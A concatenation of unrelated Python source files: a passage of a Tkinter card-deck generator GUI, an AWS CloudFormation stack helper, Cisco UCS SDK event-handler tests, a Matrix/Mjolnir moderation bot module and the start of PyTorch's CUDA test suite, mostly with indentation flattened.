self.updateProgressLabel('Output folder must exist', fg='red')
return
if imgur:
imgurId = self.imgurEntry.get()
if len(imgurId) == 0:
self.updateProgressLabel('Must have ImgurID', fg='red')
return
else:
imgurId = None
if dropbox:
dropboxToken = self.dropboxEntry.get()
if len(dropboxToken) == 0:
self.updateProgressLabel('Must have Dropbox Token', fg='red')
return
else:
dropboxToken = None
hires = bool(self.hiresVar.get())
reprints = bool(self.reprintsVar.get())
nocache = bool(self.nocacheVar.get())
basicSet = self.basicsVar.get()
self.updateConfig()
self.thread = threading.Thread(target=flipper.generate,args=(inputStr, deckName, hires, reprints, nocache, imgurId, dropboxToken, outputFolder, basicSet))
self.thread.start()
self.disableInputs()
self.updateProgressLabel('Generating....')
def disableInputs(self):
self.inputEntry.config(state='disabled')
self.inputButton.config(state='disabled')
self.deckNameEntry.config(state='disabled')
self.generateButton.config(state='disabled')
self.outputEntry.config(state='disabled')
self.outputButton.config(state='disabled')
self.hiresCheckbutton.config(state='disabled')
self.reprintsCheckbutton.config(state='disabled')
self.nocacheCheckbutton.config(state='disabled')
self.imgurCheckbutton.config(state='disabled')
self.imgurEntry.config(state='disabled')
self.dropboxCheckbutton.config(state='disabled')
self.dropboxEntry.config(state='disabled')
def enableInputs(self):
self.inputEntry.config(state='normal')
self.inputButton.config(state='normal')
self.deckNameEntry.config(state='normal')
self.generateButton.config(state='normal')
self.outputEntry.config(state='normal')
self.outputButton.config(state='normal')
self.hiresCheckbutton.config(state='normal')
self.reprintsCheckbutton.config(state='normal')
self.nocacheCheckbutton.config(state='normal')
self.imgurCheckbutton.config(state='normal')
self.dropboxCheckbutton.config(state='normal')
self.updateImgurEntry()
self.updateDropboxEntry()
def hiresVarCallback(self, name, index, mode):
hires = bool(self.hiresVar.get())
imgur = bool(self.imgurVar.get())
if hires and imgur:
self.imgurVar.set(False)
def imgurVarCallback(self, name, index, mode):
hires = bool(self.hiresVar.get())
imgur = bool(self.imgurVar.get())
dropbox = bool(self.dropboxVar.get())
if hires and imgur:
self.hiresVar.set(False)
if dropbox and imgur:
self.dropboxVar.set(False)
self.updateImgurEntry()
def updateImgurEntry(self):
imgur = bool(self.imgurVar.get())
if imgur:
self.imgurEntry.config(state='normal')
else:
self.imgurEntry.config(state='disabled')
def dropboxVarCallback(self, name, index, mode):
imgur = bool(self.imgurVar.get())
dropbox = bool(self.dropboxVar.get())
if dropbox and imgur:
self.imgurVar.set(False)
self.updateDropboxEntry()
def updateDropboxEntry(self):
dropbox = bool(self.dropboxVar.get())
if dropbox:
self.dropboxEntry.config(state='normal')
else:
self.dropboxEntry.config(state='disabled')
def updateProgressLabel(self, message, fg='black'):
self.progressLabel['text'] = message
self.progressLabel['fg'] = fg
def updateConfig(self):
hires = bool(self.hiresVar.get())
reprints = bool(self.reprintsVar.get())
nocache = bool(self.nocacheVar.get())
basicSet = self.basicsVar.get()
outputFolder = self.outputEntry.get()
imgur = bool(self.imgurVar.get())
dropbox = bool(self.dropboxVar.get())
imgurId = self.imgurEntry.get()
dropboxToken = self.dropboxEntry.get()
self.config['imgurId'] = imgurId
self.config['imgur'] = imgur
self.config['dropboxToken'] = dropboxToken
self.config['dropbox'] = dropbox
self.config['outputFolder'] = outputFolder
self.config['hires'] = hires
self.config['reprints'] = reprints
self.config['nocache'] = nocache
self.config['basicSet'] = basicSet
def loadConfig(self):
# Default values
config = {
'imgurId':None,
'imgur': False,
'dropboxToken':None,
'dropbox': False,
'outputFolder':'',
'hires' : False,
'reprints' : False,
'nocache' : False,
'basicSet' : 'guru'
}
if os.path.isfile('config.json'):
# We have some kind of saved config, let's use it.
with open('config.json', 'r',encoding='utf8') as infile:
saved = json.load(infile)
config = {**config, **saved}
self.config = config
def saveConfig(self):
with open('config.json', 'w', encoding='utf8') as outfile:
json.dump(self.config, outfile)
def main():
flipper.initApp()
root = tk.Tk()
root.title('Tableflipper Extreme')
app = FlipperGui(master=root)
root.mainloop()
if __name__ == '__main__':
sys.exit(main())
|
cloudformation.py
|
from .client import *
class cloudformation(client):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.client = self._get_client('cloudformation')
if 'ignore_drift' not in kwargs.keys() or (
kwargs['ignore_drift'] not in [True, False]
):
check_ignore = input('Ignore drift [Yes/No]: ')
if check_ignore == 'Yes':
self._ignore_drift = True
else:
self._ignore_drift = False
else:
self._ignore_drift = kwargs['ignore_drift']
def __del__(self):
logger.info(f'{self._name} complete')
def create_update(self, **kwargs):
# First try to create the stack new.
try:
create_stack = self.client.create_stack(
StackName=kwargs['stack'],
TemplateBody=kwargs['template'],
Parameters=kwargs['cli_input']['Parameters'],
Tags=kwargs['cli_input']['Tags'],
Capabilities=kwargs['capabilities'],
)
# Thread the status checker
self._stack_id=create_stack['StackId']
self._thread = threading.Thread(target=self.__check_create_update)
self._thread.start()
logger.info(f'Creating stack in {self._name}')
except botocore.exceptions.ClientError as create_error:
# The AlreadyExistsException shows when a stack with the same name already exists, begin update process.
if create_error.response['Error']['Code'] == 'AlreadyExistsException':
# Detect drift in stack before updating.
detect_drift = self.client.detect_stack_drift(StackName=kwargs['stack'])
drift_detect_id = detect_drift["StackDriftDetectionId"]
drift_detect_status = ""
while drift_detect_status not in ["DETECTION_COMPLETE", "DETECTION_FAILED"]:
check_drift_detect_status = self.client.describe_stack_drift_detection_status(StackDriftDetectionId=drift_detect_id)
drift_detect_status = check_drift_detect_status["DetectionStatus"]
time.sleep(1) # Avoid throttling
                # If there is no drift, or if we are ignoring drift, proceed with the update.
if check_drift_detect_status['StackDriftStatus'] == 'IN_SYNC' or (check_drift_detect_status['StackDriftStatus'] == 'DRIFTED' and self._ignore_drift):
if not self._ignore_drift:
logger.info(f'No drift detected in {self._name}')
try:
update_stack = self.client.update_stack(
StackName=kwargs['stack'],
TemplateBody=kwargs['template'],
Parameters=kwargs['cli_input']['Parameters'],
Tags=kwargs['cli_input']['Tags'],
Capabilities=kwargs['capabilities']
)
# Thread the status checker
self._stack_id=update_stack['StackId']
self._thread = threading.Thread(target=self.__check_create_update)
self._thread.start()
logger.info(f'Updating stack in {self._name}')
except botocore.exceptions.ClientError as update_error:
if update_error.response['Error']['Code'] == 'ValidationError':
                            # An update whose template matches the deployed stack raises a ValidationError with the message below.
                            if update_error.response['Error']['Message'] == 'No updates are to be performed.':
                                # This isn't a problem; the update is simply skipped.
                                logger.info(f'No updates to be performed in {self._name}')
                            else:
                                # Any other validation errors are problems.
                                logger.error(f'Error in {self._name} - {update_error.response["Error"]["Code"]} - {update_error.response["Error"]["Message"]}')
                        else:
                            # Non-validation update errors are also problems; log them rather than silently swallowing them.
                            logger.error(f'Unhandled update error in {self._name} - {update_error.response["Error"]["Code"]} - {update_error.response["Error"]["Message"]}')
else:
                    # If drift is detected, that's a problem; don't update the stack.
if check_drift_detect_status['StackDriftStatus'] == 'DRIFTED':
logger.warning(f'Drift detected in {self._name} - skipping update')
# If we get another response code from drift detection, we've got a problem.
else:
logger.warning(f'Unhandled drift status in {self._name} - {check_drift_detect_status["StackDriftStatus"]}')
else:
# Any other create_stack errors are problems.
logger.error(f'Unhandled create error in {self._name} - {create_error.response["Error"]["Code"]} - {create_error.response["Error"]["Message"]}')
def __check_create_update(self):
stack_status = ""
        # Any of these statuses means we need to wait and check again.
while stack_status in ["", 'CREATE_IN_PROGRESS', 'ROLLBACK_IN_PROGRESS', 'UPDATE_IN_PROGRESS', 'UPDATE_COMPLETE_CLEANUP_IN_PROGRESS', 'UPDATE_ROLLBACK_IN_PROGRESS', 'UPDATE_ROLLBACK_COMPLETE_CLEANUP_IN_PROGRESS']:
describe = self.client.describe_stacks(StackName=self._stack_id)
stack_status = describe['Stacks'][0]['StackStatus']
time.sleep(5) # Avoid throttling
        # These statuses indicate success.
        if stack_status in ['CREATE_COMPLETE', 'UPDATE_COMPLETE']:
            logger.info(f'{self._name} - {stack_status}')
        # These statuses indicate failure.
        if stack_status in ['CREATE_FAILED', 'ROLLBACK_FAILED', 'ROLLBACK_COMPLETE', 'UPDATE_ROLLBACK_FAILED', 'UPDATE_ROLLBACK_COMPLETE']:
            logger.error(f'{self._name} - {stack_status}')
def delete(self, **kwargs):
# See if the stack exists
try:
find_stack = self.client.describe_stacks(
StackName=kwargs['stack']
)
if find_stack['Stacks']:
stack_id = find_stack['Stacks'][0]['StackId']
logger.info(f'Deleting {kwargs["stack"]} from {self._name}')
delete_stack = self.client.delete_stack(
StackName=kwargs['stack']
)
self._stack_id=stack_id
self._thread = threading.Thread(target=self.__check_delete)
self._thread.start()
except botocore.exceptions.ClientError as delete_error:
logger.info(f'{kwargs["stack"]} not in {self._name}')
def __check_delete(self):
        stack_status = ""
        status_reason = ""  # initialize so the error log below never hits an undefined name
# Look through all stacks
while stack_status in ["", 'DELETE_IN_PROGRESS']:
paginator = self.client.get_paginator('list_stacks')
pages = paginator.paginate()
for page in pages:
for stack in page['StackSummaries']:
if stack['StackId'] == self._stack_id:
stack_status = stack['StackStatus']
if 'StackStatusReason' in stack.keys():
status_reason = stack['StackStatusReason']
time.sleep(5) # Avoid throttling
if stack_status == 'DELETE_COMPLETE':
logger.info(f'{self._name} - {stack_status}')
else:
logger.error(f'{self._name} - {stack_status} - {status_reason}')
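
# --- Illustrative sketch (not part of the original module) ---
# The drift handling in create_update above boils down to: start drift detection,
# poll the detection status until it finishes, then read StackDriftStatus. A
# minimal standalone version of that pattern, assuming `cfn_client` is a boto3
# CloudFormation client (the function name and signature here are hypothetical):
def _example_wait_for_drift_status(cfn_client, stack_name, poll_seconds=1):
    """Return the StackDriftStatus for stack_name once drift detection completes."""
    detection_id = cfn_client.detect_stack_drift(StackName=stack_name)['StackDriftDetectionId']
    while True:
        status = cfn_client.describe_stack_drift_detection_status(
            StackDriftDetectionId=detection_id
        )
        if status['DetectionStatus'] in ('DETECTION_COMPLETE', 'DETECTION_FAILED'):
            # StackDriftStatus may be absent if detection failed, so default to UNKNOWN.
            return status.get('StackDriftStatus', 'UNKNOWN')
        time.sleep(poll_seconds)  # avoid throttling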
|
test_eventhandler.py
|
# Copyright 2015 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from nose import SkipTest
from nose.tools import *
from ..connection.info import custom_setup, custom_teardown, get_skip_msg
import threading
handle = None
sp = None
dn = "org-root/ls-eventhandle-test"
finished = False
def setup_module():
from ucsmsdk.ucseventhandler import UcsEventHandle
from ucsmsdk.mometa.ls.LsServer import LsServer
global handle, sp, ueh
handle = custom_setup()
if not handle:
msg = get_skip_msg()
raise SkipTest(msg)
ueh = UcsEventHandle(handle)
org = handle.query_dn("org-root")
sp = LsServer(org, name="eventhandle-test", descr="")
handle.add_mo(sp, True)
handle.commit()
def teardown_module():
if sp is not None:
handle.remove_mo(sp)
handle.commit()
custom_teardown(handle)
def user_callback(mce):
global finished
finished = True
def wait_method(poll_sec=None):
# Always clear the label
sp.usr_lbl = ""
handle.add_mo(sp, modify_present=True)
handle.commit()
handle.wait_for_event(
mo=sp,
prop="usr_lbl",
value="trigger",
cb=user_callback,
timeout=20,
poll_sec=poll_sec
)
def wait_method_for_multiple_values(poll_sec=None):
handle.wait_for_event(
mo=sp,
prop="usr_lbl",
value=["trigger", "another_trigger"],
cb=user_callback,
timeout=20,
poll_sec=poll_sec
)
def trigger_method(label=None):
sp.usr_lbl = label
handle.set_mo(sp)
handle.commit()
def test_wait_for_event_mo():
global finished
finished = False
t1 = threading.Thread(name="wait", target=wait_method)
t2 = threading.Thread(name="trigger", target=trigger_method, args=("trigger",))
t1.start()
time.sleep(1)
t2.start()
t1.join()
t2.join()
assert_equal(finished, True)
def test_wait_for_poll_mo():
global finished
finished = False
t1 = threading.Thread(name="wait", target=wait_method, args=(5,))
t2 = threading.Thread(name="trigger", target=trigger_method, args=("trigger",))
t1.start()
time.sleep(1)
t2.start()
t1.join()
t2.join()
assert_equal(finished, True)
def test_wait_for_event_timeout():
global finished
finished = False
t1 = threading.Thread(name="wait", target=wait_method)
t2 = threading.Thread(name="trigger", target=trigger_method, args=("invalid_trigger",))
t1.start()
time.sleep(1)
t2.start()
t1.join()
t2.join()
assert_equal(finished, False)
def test_wait_for_poll_timeout():
global finished
finished = False
t1 = threading.Thread(name="wait", target=wait_method, args=(2,))
t2 = threading.Thread(name="trigger", target=trigger_method, args=("invalid_trigger",))
t1.start()
time.sleep(1)
t2.start()
t1.join()
t2.join()
assert_equal(finished, False)
@raises(Exception)
def test_wait_for_event_invalid_mo():
other_mo = handle.query_dn("capabilities")
handle.wait_for_event(
mo=other_mo,
prop="usr_lbl",
value="trigger",
cb=user_callback,
timeout=20
)
@raises(Exception)
def test_wait_for_poll_invalid_mo():
other_mo = handle.query_dn("capabilities")
handle.wait_for_event(
mo=other_mo,
prop="usr_lbl",
value="trigger",
cb=user_callback,
timeout=20,
poll_sec=5
)
def test_wait_for_event_multiple():
global finished
finished = False
t1 = threading.Thread(name="wait", target=wait_method_for_multiple_values)
t2 = threading.Thread(name="trigger", target=trigger_method, args=("trigger",))
t1.start()
time.sleep(1)
t2.start()
t1.join()
t2.join()
assert_equal(finished, True)
def test_wait_for_poll_multiple():
global finished
finished = False
t1 = threading.Thread(name="wait", target=wait_method_for_multiple_values, args=(2,))
t3 = threading.Thread(name="another_trigger", target=trigger_method, args=("another_trigger",))
t1.start()
time.sleep(1)
t3.start()
t1.join()
t3.join()
assert_equal(finished, True)
def test_wait_for_event_timeout_noenqueue():
handle.wait_for_event(
mo=sp,
prop="usr_lbl",
value="trigger",
cb=user_callback,
timeout=5
)
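
# --- Illustrative sketch (not part of the original tests) ---
# The tests above all share the same choreography: start the waiter thread, give it
# a one-second head start, fire the trigger thread, join both, then assert on
# `finished`. A hypothetical helper capturing that shape (names are illustrative):
def _example_run_wait_and_trigger(wait_target, trigger_label, wait_args=()):
    waiter = threading.Thread(name="wait", target=wait_target, args=wait_args)
    trigger = threading.Thread(name="trigger", target=trigger_method, args=(trigger_label,))
    waiter.start()
    time.sleep(1)  # let the waiter register its watch before triggering
    trigger.start()
    waiter.join()
    trigger.join()
    return finished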
|
matrix.py
|
from typing import *
import asyncio
import concurrent.futures
import contextlib
import logging
import threading
import nio
from .config import Config
logger = logging.getLogger('synapse_anti_ping.Matrix')
class Matrix:
def __init__(self, config: Config) -> None:
self._loop = asyncio.get_event_loop()
self._thread = threading.Thread(target=self._run)
self._thread.daemon = True # so ctrl-c cleanly exits
self._init_event = asyncio.Event()
self._config = config
assert config.user.homeserver is not None
self._client = nio.AsyncClient(config.user.homeserver, config.user.user)
def start(self) -> None:
self._thread.start()
async def _initialize(self) -> None:
logger.info('Matrix thread logging in')
while True:
result = await self._client.login(self._config.user.password)
if isinstance(result, nio.LoginError):
logger.error('Error occurred on login, trying again later: '
f'{result.message}') # type: ignore
await asyncio.sleep(2)
continue
break
logger.info('Matrix thread joining rooms')
await self._client.join(self._config.mjolnir.room)
if self._config.mjolnir.room != self._config.log.room:
await self._client.join(self._config.log.room)
logger.info('Matrix thread initialized')
self._init_event.set()
async def _complete_send_message(self, message: str, *, room: str, formatted: str, notice: bool,
join: bool) -> None:
        logger.info('Waiting to ensure init is complete')
await self._init_event.wait()
if join:
await self._client.join(room)
        logger.info('Completing send message command')
content = {
'msgtype': 'm.notice' if notice else 'm.text',
'body': message,
}
if formatted:
content['format'] = 'org.matrix.custom.html'
content['formatted_body'] = formatted
await self._client.room_send( # type: ignore
room_id=room, message_type='m.room.message', content=content)
def send_message(self,
message: str,
*,
room: str,
formatted: str = '',
notice: bool = False,
join: bool = True) -> 'concurrent.futures.Future[None]':
        logger.info('Message send in progress')
return asyncio.run_coroutine_threadsafe(
self._complete_send_message(message,
room=room,
formatted=formatted,
notice=notice,
join=join), self._loop)
def _run(self) -> None:
logger.info('Starting main loop')
asyncio.ensure_future(self._initialize(), loop=self._loop)
self._loop.run_forever()
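
# --- Illustrative sketch (not part of the original module) ---
# Matrix above runs its own asyncio event loop in a daemon thread and hands work to
# it from synchronous callers via asyncio.run_coroutine_threadsafe, which returns a
# concurrent.futures.Future. A stripped-down version of that bridging pattern
# (class and method names here are hypothetical):
class _ExampleLoopThread:
    def __init__(self) -> None:
        self._loop = asyncio.new_event_loop()
        self._thread = threading.Thread(target=self._loop.run_forever, daemon=True)

    def start(self) -> None:
        self._thread.start()

    def submit(self, coro) -> 'concurrent.futures.Future':
        # Schedule the coroutine on the background loop; the returned Future can be
        # waited on (or given callbacks) from any thread.
        return asyncio.run_coroutine_threadsafe(coro, self._loop)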
class EventLimiter:
class Inserter:
def __init__(self, key: str) -> None:
self.key = key
self.future: 'concurrent.futures.Future[None]'
def insert(self, future: 'concurrent.futures.Future[None]') -> None:
assert self
self.future = future
def __bool__(self) -> bool:
return bool(self.key)
def __init__(self) -> None:
self._active: Set[str] = set()
@contextlib.contextmanager
def insert(self, key: str) -> 'Iterator[Inserter]':
        if key in self._active:
            # A ban for this key is already in flight; hand back a falsy inserter.
            yield EventLimiter.Inserter('')
        else:
            inserter = EventLimiter.Inserter(key)
            yield inserter
            # Register the key as active *before* attaching the cleanup callback: if
            # the future has already completed, add_done_callback fires the callback
            # immediately, and it must find the key present in order to clear it.
            self._active.add(key)
            inserter.future.add_done_callback(lambda _: self._active.discard(key))
class Mjolnir:
def __init__(self, config: Config, matrix: Matrix) -> None:
self._config = config
self._matrix = matrix
self._in_progress_bans = EventLimiter()
def ban(self, user: str) -> None:
with self._in_progress_bans.insert(user) as inserter:
if not inserter:
return
logger.info(f'Ban on {user} in progress')
command = (f'{self._config.mjolnir.prefix} ban {self._config.mjolnir.banlist}'
f' user {user} spam')
inserter.future = self._matrix.send_message(command, room=self._config.mjolnir.room)
|
test_cuda.py
|
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import gc
import io
import os
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch import multiprocessing as mp
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from test_torch import AbstractTestCases
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
types = [
torch.FloatTensor,
torch.DoubleTensor,
torch.LongTensor,
torch.IntTensor,
torch.ShortTensor,
torch.CharTensor,
torch.ByteTensor,
torch.HalfTensor,
]
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
_cycles_per_ms = None
def get_cycles_per_ms():
"""Approximate number of cycles per millisecond for torch.cuda._sleep"""
global _cycles_per_ms
if _cycles_per_ms is None:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
_cycles_per_ms = 1000000 / start.elapsed_time(end)
return _cycles_per_ms
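
# --- Illustrative sketch (not part of the original test suite) ---
# Several tests below time GPU work the same way get_cycles_per_ms does: record a
# start event, launch work, record an end event, synchronize, then read
# elapsed_time() in milliseconds. A minimal standalone helper (hypothetical name):
def _example_time_gpu_ms(fn):
    """Roughly time fn() on the current CUDA stream and return milliseconds."""
    start = torch.cuda.Event(enable_timing=True)
    end = torch.cuda.Event(enable_timing=True)
    start.record()
    fn()
    end.record()
    end.synchronize()  # wait for the timed region to finish before reading the timer
    return start.elapsed_time(end)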
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
# they can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
            # the cache may be emptied (by an allocation or by empty_cache), so we
            # can't assert new_r >= last_r_arr[0]
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
            assert_change(-x)  # -x may be 0, which covers the case where tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
# Testing the behaviour for No argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
# Testing the behaviour for No argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
        # advance a generator with an end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
